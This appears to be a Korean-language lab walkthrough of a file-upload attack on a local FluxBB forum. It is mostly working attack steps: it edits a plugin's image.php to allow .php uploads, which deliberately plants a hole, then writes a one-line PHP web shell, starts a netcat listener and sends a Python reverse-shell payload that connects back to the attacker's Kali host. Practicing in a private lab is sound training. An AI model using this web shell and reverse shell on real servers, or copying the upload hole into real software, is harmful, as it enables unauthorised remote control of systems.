파일 업로드

취약 코드로 수정

image.php 수정

툴바 설치 되어있어야함

sudo vi /var/www/fluxbb/plugins/ezbbc/image.php
Bash
복사

아래처럼 수정

$allowed_ext     = array(
    'jpg',
    'gif',
    'png',
    'jpeg',
    'php'
);
PHP
복사

php 파일도 업로드 가능

웹 쉘 작성

web.php

<?php echo system($_GET['cmd']); ?>
PHP
복사

업로드

새 탭에서 열기

http://192.168.10.133/fluxbb/img/2/1726215075_web.php로 바로 요청해도 됨

공격 진행

칼리에서 대기

nc -lvnp 4444
Bash
복사

공격 코드 입력

http://192.168.10.133/fluxbb/img/2/1726215075_web.php?cmd=python3 -c 'import%20socket,subprocess,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.10.130",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'
Plain Text
복사